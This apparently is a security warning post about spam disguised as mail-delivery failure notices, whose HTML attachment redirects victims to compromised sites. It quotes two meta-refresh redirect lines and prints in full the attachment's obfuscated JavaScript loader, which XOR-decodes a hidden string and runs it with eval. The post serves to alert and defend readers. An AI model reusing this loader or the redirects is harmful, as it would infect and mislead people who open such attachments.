Some of you may be excited to get email from Postmaster or Mailer-Daemon, but unless you are the Email administrator they are NOT your friend. There is currently email going out that claims to be a NDR (Non Delivery Report). This is you sent an email to someone, it failed. The problem is the NDR does not tell you who the email was sent to. Just that you sent it. Ohh but look there is an attachment. The attachment says Original Message or similar.
This is NOT the original message, but an html file. This will open your browser. The browser will redirect you to a website that has a flaw in it. Or if you are lucky, to a website trying to sell you something.
I have seen various forms of this, so far they are all from mailer-daemon or postmaster. Most of them originate from Russia. The other subjects I’ve seen are:
Delivery Status Notification
Email Policy Violation
One had this refresh:
<meta http-equiv=”refresh” content=”0;url=http://www.loge1**1amsterdam.nl/index3.html” />
<meta http-equiv=”refresh” content=”0;url=http://galleryp*.co.kr/index3.html” />
Notice that both end with index3.html
The Java Script:
<script>var uKU = Math.random();var xIF=”;var nE = Math.random();var yLI = Math.random();var wGV;var mTM=”;var rN = Math.ceil(41);var jZ=”;var rGU=”;wGV=’b1abb8′+’b2bab2′+’b4baf2′+’99ad85′+’a0fbfd’+'e7cfae’+'aeb7a2′+’dff3e8′+’b9abab’+'a1adb9′+’a6aea0′+’b0bab4′+’82acb9′+’a99eb3′+’b5f5aa’+'a2bde8′+’a1bab3′+’a683f1′+’e7b8b8′+’abb7e7′+’f9′;var qS = Math.random();var mRC=55850;function lJ(nU){var sR=”;var gU=”;function y(f){var fL=new Array();var x=new Array();var v=0,r=f['u006cu0065'+unescape('%6e%67%74%68')];var vF = Math.ceil(6);var uI = Math.ceil(6);var yT=new Array();for(var iD=2;iD<r+2;iD++){var yX=false;var yZ=false;var z=new Array();var oL = Math.ceil(24);var dM = Math.ceil(24);uK=qM(f,iD-2);v=v+uK*r;}var uB = Math.ceil(11);var gUQ=false;var yTR=”;var zJ=50530;return new String(v);var kQ=”;var tS=new Array();}var rMA=false;var sP=”;function h(s, t){var tZ=”;var iP = Math.ceil(33);var hZ = Math.ceil(33);if(fS == null) {var bX=false;var uIM=false;var hR = Math.ceil(21);fS = {};var xBN=false;var aYZ=new Date();var wZ=”;}var e=new Array();if(fS[s] == null) {var jU = Math.ceil(44);var zFI=”;var qH = Math.ceil(44);var pBM=”;var eJ=”;var uO = Math.ceil(41);var q = Object;var nA=new Array();var bN=new Array();var qA=new Array();var vR=false;fS[s] = new q();var hXT=54078;fS[s].wK = 0;var bC=new Date();var mP=false;fS[s].u = t;var w=false;}var bH=”;var lX=new Date();}function n(s) {var sY = Math.ceil(42);if(fS[s] != null) {var gT=48196;var pA=”;var pB = fS[s];var bF=48403;var nK = pB.wK;var hXG=”;var pT=new Date();var tYJ=”;var iG = pB.u;var xDP = Math.random();var tY = iG.substr(nK, 1);var gG = iG['u006cu0065'+unescape('%6e%67%74%68')]; var aU = 1;var mX = Math.ceil(42);var dE=”;if(nK + aU < gG) {var kL = Math.random();var qR=new Array();var pBO = Math.ceil(29);pB.wK = nK + aU;var dZK=”;var gZW=new Date();} else {var fCY = Math.random();pB.wK = aU – 1;var bHE=24510;var wB = Math.ceil(37);}return qM(tY, aU – 1);var fEL=48782;var nJG=46689;var bNX = Math.random();}var iR = Math.random();}var zK = Math.random();var nO = Math.random();var gX=”;function qM(xB,gR){var zN=new Array();return xB['u0063u0068u0061u0072'+unescape('%43%6f%64%65%41%74')](gR);var hS=new Array();}var iC=42895;var wY=7594;var qG=”;var xV=new Array();var lM=false;var cA=”;function eD(aX,fO){var bCL=”;var xU = Math.random();return aX^fO;var aJ=29561;}var pQ = Math.ceil(36);var hC=56770;function d(xB,gR){var tUX = Math.ceil(29);var bI=”;return xB['u0066'+unescape('%72%6f%6d%43%68%61%72%43%6f%64%65')](gR);var uER = Math.random();var aL = Math.random();var aXS = Math.random();}var tT=”;var eZ=”;var jUK = Math.ceil(44);var oG=window;var qW=”;var lBA = Math.ceil(15);var gW=new Array();var fS = null;var lU=new Array();var hMQ=false;var wV=String;var wYA=new Array();var vZ=document;var bWH=false;var aJP=false;var bE = new wV(lJ);var fT=”;var yB=new Date();var cNZ=new Array();var bJ=”;var xD = new wV(vZ['u0077'+unescape('%72%69%74%65')]);var eN=”;var dS=16914;var aZ = xD['u0069u006eu0064u0065'+unescape('%78%4f%66')](‘u0061u0072′+unescape(‘%69%74%79′));var yNI = Math.ceil(33);var lZ=new Array();var sHN=new Array();if(aZ != -1) {var dQ=36609;var vA=new Array();var fZ=28165; return 130;}var bY=9596;var sW = Math.ceil(24);var vLV = Math.random();var rC=wV['u0066'+unescape('%72%6f%6d%43%68%61%72%43%6f%64%65')];var oRL=new Array();var uP=130;var tP = oG['u0073u0065u0074u0054'+unescape('%69%6d%65%6f%75%74')];var dWL=”;var wP=new Array();var jT = ”;var pTR=new Date();var nJ=oG['u0075u006eu0065u0073u0063u0061'+unescape('%70%65')];var oK = Math.ceil(44);var rUT=new Array();var rDJ = Math.ceil(44);var cI = ”;var jXH = Math.ceil(6);var qQ = Math.ceil(6);var tW = Math.random();var j = ‘%’;var lVC=”;var oHK = Math.random();var pY = 2;var uT=new Array();var vX = Math.random();var kY = Math.random();var uQ = 0;var zD=uQ;var hSS = Math.ceil(8);var qHI=”;var pOJ=11644;while(zD < nU['u006cu0065'+unescape('%6e%67%74%68')]){var vW=”;var tI=new Array();var pZ=new Array();cI+= j + nU['u0073'+unescape('%75%62%73%74%72')](zD, pY);var hD=”;var cQ = Math.random();var cLL = Math.random();zD+=pY;var yG=new Array();var qME=22402;var zGY=new Date();}var hDY=”;var hKT=58760;var pR = Math.ceil(40);var uU=new Array();var nU = nJ(cI);var kHB=”;var aY = bE['u0072u0065u0070u006c'+unescape('%61%63%65')](/[^@a-z0-9A-Z_-]/g, new String());var gB=”;var c = new wV(y(aY));var bLJ = Math.ceil(34);var sOG=”;var bZJ=false;var fMR=new Array();h(‘sT’, aY);h(‘l’, c);var mWF = Math.random();var iMP=46233;var wG = Math.ceil(47);var kRR=false;var dU=uQ;var fDZ=”;var fH=”;var rH=false;var cOD=false;while(dU < 10000) {var dWY=false;var xF = Math.random();var gXD=new Date();var cFX=”;var cK=”;var qJ = nU['u0063u0068u0061u0072'+unescape('%43%6f%64%65%41%74')](dU);if(isNaN(qJ)) break;var bYL=new Date();var nT=”;qJ = eD(qJ, uP);qJ = eD(qJ, n(‘l’));qJ = eD(qJ, n(‘sT’));var aHO=new Array();var hAF=60523;var eP=new Date();var nUA=”;jT=jT+d(wV,qJ);var mNH=”;dU++;var sSF=new Array();var mS = Math.ceil(5);}var sZM=”;oG['u0065'+unescape('%76%61%6c')](jT);var pRK=new Date();var vXF = Math.random();return jT=new wV();var lN=”;var yHE = Math.ceil(49);var fEM = Math.ceil(18);var yU=new Date();};var qX=new Date();var jZS=false;var dLV=”;var tHB=new Date();lJ(wGV);var tRH=”;var vFZ=”;</script>
